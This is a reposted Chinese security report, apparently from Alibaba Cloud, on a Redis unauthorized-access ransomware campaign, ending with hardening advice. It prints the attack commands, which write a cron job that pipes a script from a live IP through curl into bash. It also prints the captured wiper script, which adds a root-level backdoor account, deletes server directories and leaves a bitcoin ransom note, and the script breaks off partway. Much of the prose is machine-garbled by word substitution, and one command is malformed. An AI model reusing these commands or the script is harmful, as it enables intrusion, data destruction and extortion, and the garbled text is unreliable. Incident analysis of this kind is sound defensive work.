删库跑路加勒索,Redis勒索事件爆发

安然事故

9月10日下昼15:06开始,阿里云官方首次发明一路规模化使用Redis 未授权造访破绽进行加密泉币打单的事故,阿里云上防御系统在进击开始的10s内就已开启全网拦截。

与以往的只是经由过程算力偷取进行挖矿的进击事故不合,这次进击者在进击之初便因此打单钱财作为第一目的的,进击者无惧裸露,异常跋扈狂。直接删除数据、加密数据也意味着进击者与防御者之间已经没有缓冲地带,基础的攻防抗衡将是赤裸裸的一场刺刀战。

该高危破绽早在半年前阿里云就宣布过预警,然则照样有不少用户并未进行改动加以注重。阿里云安然专家提醒用户参考文末措施,尽快完成破绽修复或支配防御,一旦被进击成功,全部办事器的法度榜样和数据都将会被删除!且很难规复。

Redis利用简介

Redis是一个开源的应用ANSI C说话编写、支持收集、可基于内存亦可持久化的日志型、Key-Value数据库,并供给多种说话的API。从2010年3月15日起,Redis的开拓事情由VMware主持。从2013年5月开始,Redis的开拓由Pivotal辅助。

Redis破绽道理

作为一个内存数据库,redis 可经由过程周期性设置设置设备摆设摆设或者手动履行save敕令,将缓存中的值写入到磁盘文件中。假如redis进程权限足够,进击者就可以使用它的未授权破绽来写入计划义务、ssh登录密钥、webshell 等等,以达到履行随意率性指令的目的。

自2017年12月以来,因为该破绽已经被大年夜规模使用,如DDG等多个僵尸收集都以该破绽为目标进行迅速的滋生和攻克算力,并且各大年夜僵尸收集间都邑相互删除彼此来包管自己对机械算力的掌握。

进击历程阐明

– 首先辈击者经由过程事先的扫描踩点,发清楚明了这些公网可造访并且未设置密码的机械

– 进击者考试测验连接这些机械,并且运行如下代码:

config set dir /var/spool/cron/

config set dbfilename root

config 1 */10 * * * * curl -s http://103.224.80.52/butterfly.sh | bash

save

经由过程上述指令,将下载脚本:http://103.224.80.52/butterfly.sh 并将该脚本写入到计划义务中,由计划义务启动履行。

因为在阐发时,进击者感知到我们的反向探查,已经将该脚本下线。但我们的蜜罐成功抓取到了该脚本如下:

#!/bin/bash

#*butterfly*

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

userdel -r redis

useradd -o -u 0 -g 0 redis&>/dev/null

echo “abcd-1234-!” |passwd –stdin redis &>/dev/null

rm -rf /root/*

rm -rf /home/*

rm -rf /opt/*

rm -rf /data/*

rm -rf /data*

mkdir -p /data

echo -e “\nWarning! \nYour File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail with your server IP Address and a Proof of Payment. Any eMail without your server IP Address and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! \nMail:dbsecuritys@protonmail.com \nBitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny\n” > /root/Warning.txt

chmod +x /root/Warning.txt

cp /root/Warning.txt /Warning.txt

cp /root/Warning.txt /data/Warning.txt

echo -e “\nWarning! \nYour File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail with your server IP Address and a Proof of Payment. Any eMail without your server IP Address and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are

– 进击者要求给地址: 3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny 发送0.6个比特币,否则将在24小时之内删除数据备份

– 然则从这个脚本中可以显着看出,进击者根本没有进行备份,纵然被进击者给了钱,也是要不回数据的。

截止到9月10日晚8点为止,该地址共收到了0.6个比特币的转账,并且都是在今日进行发送的,已经有受害者开始转账了。

安然建议

– 经由过程安然组限定对公网对Redis等办事的造访

– 经由过程改动redis.conf设置设置设备摆设摆设文件,增添密码认证,并暗藏紧张敕令

– 以低权限运行redis办事等

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包